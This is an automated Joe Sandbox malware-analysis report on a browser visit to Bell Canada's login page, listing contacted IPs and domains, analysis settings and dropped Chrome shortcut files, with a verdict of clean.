                                                                                                                                                                                                                                                                                                                              https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCb7424d10cb45420b8dd270fd16b2f20chromecache_467.2.drfalse
                                                                                                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                                                                                                https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCd18a66557b034fc5825d670005205c3chromecache_543.2.drfalse
                                                                                                                                                                                                                                                                                                                                  unknown
                                                                                                                                                                                                                                                                                                                                  https://www.google.com/recaptcha/api2/chromecache_330.2.dr, chromecache_373.2.dr, chromecache_271.2.drfalse
                                                                                                                                                                                                                                                                                                                                    unknown
                                                                                                                                                                                                                                                                                                                                    https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC70933dcf655e4484bbad15d268bdebfchromecache_497.2.drfalse
                                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                                      http://kenwheeler.github.io/slickchromecache_406.2.dr, chromecache_504.2.drfalse
                                                                                                                                                                                                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                                                                                                      142.250.185.228
                                                                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                      52.214.60.57
                                                                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                      147.75.178.60
                                                                                                                                                                                                                                                                                                                                      digital.lb.can.medallia.caSwitzerland
                                                                                                                                                                                                                                                                                                                                      30109MEDALLIA-INCUSfalse
                                                                                                                                                                                                                                                                                                                                      66.235.152.225
                                                                                                                                                                                                                                                                                                                                      adobetarget.data.adobedc.netUnited States
                                                                                                                                                                                                                                                                                                                                      15224OMNITUREUSfalse
                                                                                                                                                                                                                                                                                                                                      108.156.60.64
                                                                                                                                                                                                                                                                                                                                      api2.branch.ioUnited States
                                                                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                      206.47.98.207
                                                                                                                                                                                                                                                                                                                                      mybell-on-priority.gdns.bell.caCanada
                                                                                                                                                                                                                                                                                                                                      577BACOMCAfalse
                                                                                                                                                                                                                                                                                                                                      66.235.152.221
                                                                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                                                                      15224OMNITUREUSfalse
                                                                                                                                                                                                                                                                                                                                      3.162.38.87
                                                                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                      52.50.97.18
                                                                                                                                                                                                                                                                                                                                      dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                      18.184.216.10
                                                                                                                                                                                                                                                                                                                                      ps.eyeota.netUnited States
                                                                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                      130.61.120.2
                                                                                                                                                                                                                                                                                                                                      collection.decibelinsight.netUnited States
                                                                                                                                                                                                                                                                                                                                      31898ORACLE-BMC-31898USfalse
                                                                                                                                                                                                                                                                                                                                      34.250.133.195
                                                                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                      34.117.77.79
                                                                                                                                                                                                                                                                                                                                      ml314.comUnited States
                                                                                                                                                                                                                                                                                                                                      139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                                                                                                                                                      162.159.140.229
                                                                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                      63.32.87.126
                                                                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                      104.244.42.131
                                                                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                                                                      13414TWITTERUSfalse
                                                                                                                                                                                                                                                                                                                                      63.140.62.17
                                                                                                                                                                                                                                                                                                                                      bell.ca.ssl.sc.omtrdc.netUnited States
                                                                                                                                                                                                                                                                                                                                      15224OMNITUREUSfalse
                                                                                                                                                                                                                                                                                                                                      142.250.185.238
                                                                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                      108.138.26.118
                                                                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                      239.255.255.250
                                                                                                                                                                                                                                                                                                                                      unknownReserved
                                                                                                                                                                                                                                                                                                                                      unknownunknownfalse
                                                                                                                                                                                                                                                                                                                                      188.114.97.3
                                                                                                                                                                                                                                                                                                                                      unknownEuropean Union
                                                                                                                                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                      150.171.29.10
                                                                                                                                                                                                                                                                                                                                      ax-0001.ax-dc-msedge.netUnited States
                                                                                                                                                                                                                                                                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                                                                                      199.232.188.157
                                                                                                                                                                                                                                                                                                                                      platform.twitter.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                                                                      54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                                                                      143.204.207.250
                                                                                                                                                                                                                                                                                                                                      sc-static.netUnited States
                                                                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                      52.223.40.198
                                                                                                                                                                                                                                                                                                                                      match.adsrvr.orgUnited States
                                                                                                                                                                                                                                                                                                                                      8987AMAZONEXPANSIONGBfalse
                                                                                                                                                                                                                                                                                                                                      172.217.18.100
                                                                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                      18.239.50.55
                                                                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                      98.82.156.107
                                                                                                                                                                                                                                                                                                                                      s.amazon-adsystem.comUnited States
                                                                                                                                                                                                                                                                                                                                      11351TWC-11351-NORTHEASTUSfalse
                                                                                                                                                                                                                                                                                                                                      18.239.18.118
                                                                                                                                                                                                                                                                                                                                      app.linkUnited States
                                                                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                      64.233.167.157
                                                                                                                                                                                                                                                                                                                                      stats.g.doubleclick.netUnited States
                                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                      52.9.108.223
                                                                                                                                                                                                                                                                                                                                      custom.bnc.ltUnited States
                                                                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                      142.250.186.174
                                                                                                                                                                                                                                                                                                                                      youtube-ui.l.google.comUnited States
                                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                      18.239.18.88
                                                                                                                                                                                                                                                                                                                                      bell.app.linkUnited States
                                                                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                      216.58.206.36
                                                                                                                                                                                                                                                                                                                                      www.google.comUnited States
                                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                      63.140.62.27
                                                                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                                                                      15224OMNITUREUSfalse
                                                                                                                                                                                                                                                                                                                                      157.240.0.6
                                                                                                                                                                                                                                                                                                                                      scontent.xx.fbcdn.netUnited States
                                                                                                                                                                                                                                                                                                                                      32934FACEBOOKUSfalse
                                                                                                                                                                                                                                                                                                                                      87.248.119.251
                                                                                                                                                                                                                                                                                                                                      unknownUnited Kingdom
                                                                                                                                                                                                                                                                                                                                      203220YAHOO-DEBDEfalse
                                                                                                                                                                                                                                                                                                                                      87.248.119.252
                                                                                                                                                                                                                                                                                                                                      dcs-ups.g03.yahoodns.netUnited Kingdom
                                                                                                                                                                                                                                                                                                                                      203220YAHOO-DEBDEfalse
                                                                                                                                                                                                                                                                                                                                      98.82.157.231
                                                                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                                                                      11351TWC-11351-NORTHEASTUSfalse
                                                                                                                                                                                                                                                                                                                                      142.250.185.164
                                                                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                      146.75.117.230
                                                                                                                                                                                                                                                                                                                                      medallia2.map.fastly.netSweden
                                                                                                                                                                                                                                                                                                                                      30051SCCGOVUSfalse
                                                                                                                                                                                                                                                                                                                                      150.171.28.10
                                                                                                                                                                                                                                                                                                                                      ax-0001.ax-msedge.netUnited States
                                                                                                                                                                                                                                                                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                                                                                      142.250.186.98
                                                                                                                                                                                                                                                                                                                                      googleads.g.doubleclick.netUnited States
                                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                      13.107.253.45
                                                                                                                                                                                                                                                                                                                                      s-part-0017.t-0009.fb-t-msedge.netUnited States
                                                                                                                                                                                                                                                                                                                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                                                                                                      104.244.42.3
                                                                                                                                                                                                                                                                                                                                      s.twitter.comUnited States
                                                                                                                                                                                                                                                                                                                                      13414TWITTERUSfalse
                                                                                                                                                                                                                                                                                                                                      18.66.27.34
                                                                                                                                                                                                                                                                                                                                      cdn.branch.ioUnited States
                                                                                                                                                                                                                                                                                                                                      3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                                                                                                      18.65.39.29
                                                                                                                                                                                                                                                                                                                                      d1tcwf12y4kqv3.cloudfront.netUnited States
                                                                                                                                                                                                                                                                                                                                      3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                                                                                                      35.241.45.82
                                                                                                                                                                                                                                                                                                                                      cooladata.kampyle.comUnited States
                                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                      142.250.185.130
                                                                                                                                                                                                                                                                                                                                      cm.g.doubleclick.netUnited States
                                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                      142.250.185.174
                                                                                                                                                                                                                                                                                                                                      analytics.google.comUnited States
                                                                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                                                                      54.194.72.83
                                                                                                                                                                                                                                                                                                                                      sync.crwdcntrl.netUnited States
                                                                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                                                                      188.114.96.3
                                                                                                                                                                                                                                                                                                                                      siteimproveanalytics.comEuropean Union
                                                                                                                                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                      172.66.0.227
                                                                                                                                                                                                                                                                                                                                      t.coUnited States
                                                                                                                                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                                                                      IP
                                                                                                                                                                                                                                                                                                                                      192.168.2.9
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                                                                      Analysis ID:1546108
                                                                                                                                                                                                                                                                                                                                      Start date and time:2024-10-31 14:10:54 +01:00
                                                                                                                                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                                                                      Overall analysis duration:0h 4m 53s
                                                                                                                                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                                                                                                                                      Cookbook file name:browseurl.jbs
                                                                                                                                                                                                                                                                                                                                      Sample URL:https://mybell.bell.ca/Login?language=en
                                                                                                                                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                                                                      Number of analysed new started processes analysed:15
                                                                                                                                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                                                                      Detection:CLEAN
                                                                                                                                                                                                                                                                                                                                      Classification:clean1.win@37/480@197/54
                                                                                                                                                                                                                                                                                                                                      EGA Information:Failed
                                                                                                                                                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                                                                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 172.217.16.195, 142.250.186.142, 74.125.133.84, 34.104.35.123, 95.101.54.106, 95.101.54.122, 23.196.127.191, 23.4.42.69, 184.87.40.175, 23.64.167.181, 23.48.180.230, 23.10.222.192, 23.204.222.86, 2.16.164.50, 2.16.164.35, 20.109.210.53, 192.229.221.95, 184.28.89.29, 142.250.184.234, 216.58.212.170, 216.58.206.42, 172.217.23.106, 142.250.186.74, 142.250.185.74, 142.250.184.202, 216.58.206.74, 142.250.185.138, 142.250.185.170, 142.250.185.202, 142.250.185.234, 142.250.186.170, 142.250.181.234, 142.250.185.106, 142.250.186.42, 142.250.184.195, 13.95.31.18, 142.250.184.200, 142.250.186.35, 54.154.185.216, 52.30.115.192, 52.30.233.14, 172.217.18.104, 104.119.188.216, 23.212.185.194, 23.212.249.73, 23.203.48.160, 23.212.249.90, 173.222.162.149, 23.11.229.186, 104.119.188.186, 216.58.206.67, 23.203.48.182, 23.67.33.47, 173.222.162.147, 23.67.33.40, 13.107.21.237, 204.79.197.237, 2.23.196.132, 20.12.23.50, 52.165.164.15, 184.27.96.174, 142.250.186.163, 2.16.164.104, 2.16.164.
                                                                                                                                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, cn-assets.adobedtm.com.edgekey.net, clarity-ingest-eus2-c-sc.eastus2.cloudapp.azure.com, clientservices.googleapis.com, a1024.dscg.akamai.net, www.bell.ca.akadns.net, l-0005.l-msedge.net, a248.b.akamai.net, clients2.google.com, ocsp.digicert.com, www.googletagmanager.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, bat.bing.com, analytics.tiktok.com.edgekey.net, azurefd-t-prod.trafficmanager.net, www.gstatic.com, glb.sls.prod.dcat.dsp.trafficmanager.net, e4518.dscx.akamaiedge.net, ip46.go-mpulse.net.edgekey.net, www-linkedin-com.l-0005.l-msedge.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, c-bing-com.dual-a-0034.a-msedge.net, cm.everesttech.net.akadns.net, e35058.a.akamaiedge.net, a390.r.akamai.net, mybell-qc.akamaized.net, od.linkedin.edg
                                                                                                                                                                                                                                                                                                                                      • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                                                                      • VT rate limit hit for: https://mybell.bell.ca/Login?language=en
                                                                                                                                                                                                                                                                                                                                      No simulations
                                                                                                                                                                                                                                                                                                                                      SourceURL
                                                                                                                                                                                                                                                                                                                                      Screenshothttps://m.bell.ca/getapploginpage
                                                                                                                                                                                                                                                                                                                                      Screenshothttps://m.bell.ca/supportrqcode
                                                                                                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 31 12:11:52 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):2673
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.971528685719368
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:8Xvd1TkjHyidAKZdA1P4ehwiZUklqehJy+3:8LwMOCy
                                                                                                                                                                                                                                                                                                                                      MD5:7E559CED085A2978C00516C6283F1D7D
                                                                                                                                                                                                                                                                                                                                      SHA1:3BB6B115322E6A4531A488AD65DEA1C8EB7F885D
                                                                                                                                                                                                                                                                                                                                      SHA-256:93DA0B5F77899683A4CA3DB82D6BCA5A1AD7EB9C0BB5E4ADB7EB5F8B083322D2
                                                                                                                                                                                                                                                                                                                                      SHA-512:483197018960C46BEB835CB1555CB8D539442A0276D23F795FB23626102A9A4C127C7FE14BD70EDCE7FF5364C83B04C2F0C01E7AD7E3C22F59FC5092AE0E6E45
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,......s.+....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I_Yyi....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V_Yyi....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V_Yyi....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V_Yyi.............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V_Yzi...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 31 12:11:52 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):2675
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.987606937870428
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:8jd1TkjHyidAKZdA1+4eh/iZUkAQkqehyy+2:8XwNF9Qjy
                                                                                                                                                                                                                                                                                                                                      MD5:58939505D93A73A3CB4CA6B6DC2A543B
                                                                                                                                                                                                                                                                                                                                      SHA1:FC787C88A098333BDB16A4F56ADA8E502308BD11
                                                                                                                                                                                                                                                                                                                                      SHA-256:E5B062DA0F00A1CA85DFF2B09D0AED1BBC1A2CF8195EAC0BDA4F01C139B423B6
                                                                                                                                                                                                                                                                                                                                      SHA-512:34A1902D6281E9E45CC75228C9A4B10E8933F4CFFE0FF31EB3134939034C0B6AEDB734D2807F1C5F357BABBAB2DDF6AE5427FCAEB9E09C8B63A4A0FEA59E7DEA
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,.....(.s.+....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I_Yyi....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V_Yyi....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V_Yyi....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V_Yyi.............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V_Yzi...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:56:51 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):2689
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.99517112754733
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:8rd1TkVHyidAKZdA1404eh7sFiZUkmgqeh7sky+BX:8vwqInmy
                                                                                                                                                                                                                                                                                                                                      MD5:FBF492718641D64FBCD9627BBCF6B358
                                                                                                                                                                                                                                                                                                                                      SHA1:334E7A390171577CE47E276A02B3DFBC088404A5
                                                                                                                                                                                                                                                                                                                                      SHA-256:9EC6A1807852BF33820377F48328608966CE489CB59F079F1D50E61767B12D60
                                                                                                                                                                                                                                                                                                                                      SHA-512:EEBB631BD96CCAEC6D2D78FA83BCDD5D893A9C541BBC93AF40E7395FD7069C30F830499BF755561B196BE082DFCEEDBA27E4A1AF9B4FE800A7D2D49BFB5729A1
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,.....<}.i.....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I_Yyi....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V_Yyi....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V_Yyi....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V_Yyi.............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.VEW.F...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 31 12:11:52 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):2677
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.9854907404264512
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:8zd1TkjHyidAKZdA1p4ehDiZUkwqeh+y+R:8Hwa58y
                                                                                                                                                                                                                                                                                                                                      MD5:753F761A8D47BACC67B6F047D8304AA1
                                                                                                                                                                                                                                                                                                                                      SHA1:32503883CE7D3C6ABE600843EBF850DF3FC8170A
                                                                                                                                                                                                                                                                                                                                      SHA-256:D3EE300B530B4C0F4D5F1FAFAABADA6D1ED0B16BBCA74F854B5CFC00EDF50F08
                                                                                                                                                                                                                                                                                                                                      SHA-512:EB1D11A0D7903A8B0B132D7EFCB4AFF19CD2900739E095BC77DF753FD07D57043ADEDE62B3BD60BB97F386C17B554F6C570CE3AD4BC77ADC5C79937C5A6A46E3
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,....K.s.+....v'&... w......................1....P.O. .:i.....+00.../C:\.....................1.....EW.I..PROGRA~1..t......O.I_Yyi....B...............J.....\...P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V_Yyi....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.F..Chrome..>......CW.V_Yyi....M......................O..C.h.r.o.m.e.....`.1.....EW.F..APPLIC~1..H......CW.V_Yyi.............................A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.L .CHROME~1.EXE..R......CW.V_Yzi...........................).c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............a.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 31 12:11:52 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                                                      Category:dropped
